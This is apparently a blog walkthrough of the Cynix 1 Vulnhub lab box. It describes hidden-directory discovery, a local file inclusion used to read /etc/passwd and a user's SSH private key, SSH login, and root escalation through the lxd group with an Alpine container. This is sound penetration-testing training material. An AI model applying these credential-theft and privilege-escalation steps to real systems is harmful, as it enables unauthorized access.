This is the Cynix 1 vulnhub walkthrough for the Cynix 1 vulnerable Linux box found on vulnhub.com, enjoy.
You will need Burp Suite Community Edition, I laid out in another post how to setup Burp and FoxyProxy to make the Burp setup process so much easier.
Cynix 1 is a great vulnhub box I think it ties together tough web enumeration and a unique privilege escalation method nicely in one challenging and realistic OSCP like machine.
Table of Contents
Recon
Nmap is the first tool to run an inital recon with. Looks like 80, 6688 are open. SSH and HTTP are both services that I will inspect and hopefully exploit soon.
I also run AutoRecon and look at its output for clues.
How To Do Web Enumeration
Running gobuster, dirsearch, and AutoRecon are able to locate some basic but uninteresting endpoints.
I tried dirsearch, gobuster, and AutoRecon. None of them worked to find the hidden endpoint. So the next tool to try was dirbuster which I started by typing dirbuster in a terminal.
I cycled through several wordlists until this one worked to pull up the lavalamp endpoint which is a hidden directory but we have access to it.
You can see that dirbuster is pretty handy for this type of mindless directory busting.
So looking at the exposed webpage there is a fully functional site with a Contact tab. Take a look.
Next I will use Burp. But first there is a small detail that will completely trip you up unless you take notice and make an adjustment.
Visit the page as https or you will see TLS cert errors.
In order to capture the request you must visit https://10.0.0.245/lavalamp/#section-contact if you try to visit the HTTP site it will have TLS issues.
How To Use Burp Suite
It was for this reason that I thought to try the HTTPS version instead and it worked like a charm.
Capture the response from the server for the request sent by the contact form submission.
The server responds with a weird response containing a new endpoint we have apparently missed.
Once you change the opacity (transparency) value to a positive integer such as 1 or 100 the header box is now filled with text asking for an input.
The parameter appears now and that could indicate the presence of a local file inclusion vulnerability.
Let’s try then to exploit it by checking if the server will give up the contents of the /etc/passwd file on the server.
Exploit To Get A Shell
Here is the thinking on getting a shell on Cynix 1, remember how there is an SSH service running on TCP 6688?
That means we can search for the user’s .ssh directory for the id_rsa key. The key can used to connect to an SSH server as the user.
In this case the user is ford and I can connect using the command ssh -i id_rsa [email protected] which works to get a shell.
I issue the command and get a shell.
Privilege Escalation
I run LinEnum.sh and check the output.
So what the heck is lxd and why would someone be in the lxd group?
LXD is a next generation system container manager. It offers a user experience similar to virtual machines but using Linux containers instead.
It's image based with pre-made images available for a wide number of Linux distributions and is built around a very powerful, yet pretty simple, REST API.
The core of LXD is a privileged daemon which exposes a REST API over a local unix socket.Installing lxd is similar to installing Docker. Only lxd adds the current user to the lxd group. The lxd daemon is a root level service which means it can exploited to escalate to root.
So here is the idea – to start a new container with elevated privileges and to do that we need to build a basic container.
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder.git
./build-alpineAfter the builder runs use a web server to host the file to transfer it to the target.
Move the gzipped file to the target and let’s run through an lxc import and container startup to escalate privileges.
Exploiting lxd involves running the privileged container configuration.
Now change to the directory I supplied and read the root flag for the /root directory.
That’s it for the Cynix 1 vulnhub walkthrough!
- How to Ace Your Junior Penetration Tester Interview and Land the Job
- Another PowerView Tutorial: How To Use PowerView In A Penetration Test
- The HackMyVM Keys Walkthrough
- OSCP Prep: M87 Vulnhub Walkthrough
- The Hacker Kid Vulnhub Walkthrough